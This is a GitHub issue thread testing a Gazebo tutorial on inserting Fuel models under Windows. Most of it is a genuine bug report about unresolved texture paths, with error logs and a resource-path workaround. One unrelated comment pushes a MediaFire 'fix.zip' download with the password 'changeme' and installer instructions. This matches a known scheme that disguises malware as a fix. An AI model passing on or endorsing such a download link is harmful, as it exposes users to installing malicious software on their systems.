gazebosim/gazebo_test_cases #1063: docs: fuel_insert

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/docs/ionic/fuel_insert)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/Model_insertion_fuel.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-12:
You can add me to this one

knmcguire, 2024-09-12:
This tutorial resulted in some errors on win11  ❌

The resource spawning that retrieved the models directly online didn't work. After download the picture didn't show up and I wasn't able to select to spawn in the scene:

[image]

I also got the following error in the window where I run the `-g` part of the sim

```
(2024-09-12 21:08:21.123) [error] [SystemPaths.cc:455] [GUI] Could not resolve file [../materials/textures/MineCartEngine_Albedo.png]
(2024-09-12 21:08:21.123) [error] [Material.cc:176] [GUI] Unable to find texture [../materials/textures/MineCartEngine_Albedo.png] as a locally cached texture or in path [C:\Users\kimbe\.gz\fuel\fuel.gazebosim.org\openrobotics\models\mine cart engine\4]
```

When I downloaded it and added my own local resource with it did work: 
[image]

When I added the fuel model from the https:// directly, I again got the following error message from above, but this time from the sim server side:

```
(2024-09-12 21:03:41.309) [error] [SystemPaths.cc:455] Could not resolve file [../materials/textures/MineCartEngine_Albedo.png]
(2024-09-12 21:03:41.310) [error] [Material.cc:176] Unable to find texture [../materials/textures/MineCartEngine_Albedo.png] as a locally cached texture or in path [C:\Users\kimbe\.gz\fuel\fuel.gazebosim.org\openrobotics\models\mine cart engine\4]
```

Inserting the model into the sdf file directly however did work.

> Note: in the windows cmd line I had to use:  `SET GZ_SIM_RESOURCE_PATH=%USERPROFILE%\gazebo_models\`

closed 2025-08-27 by azeey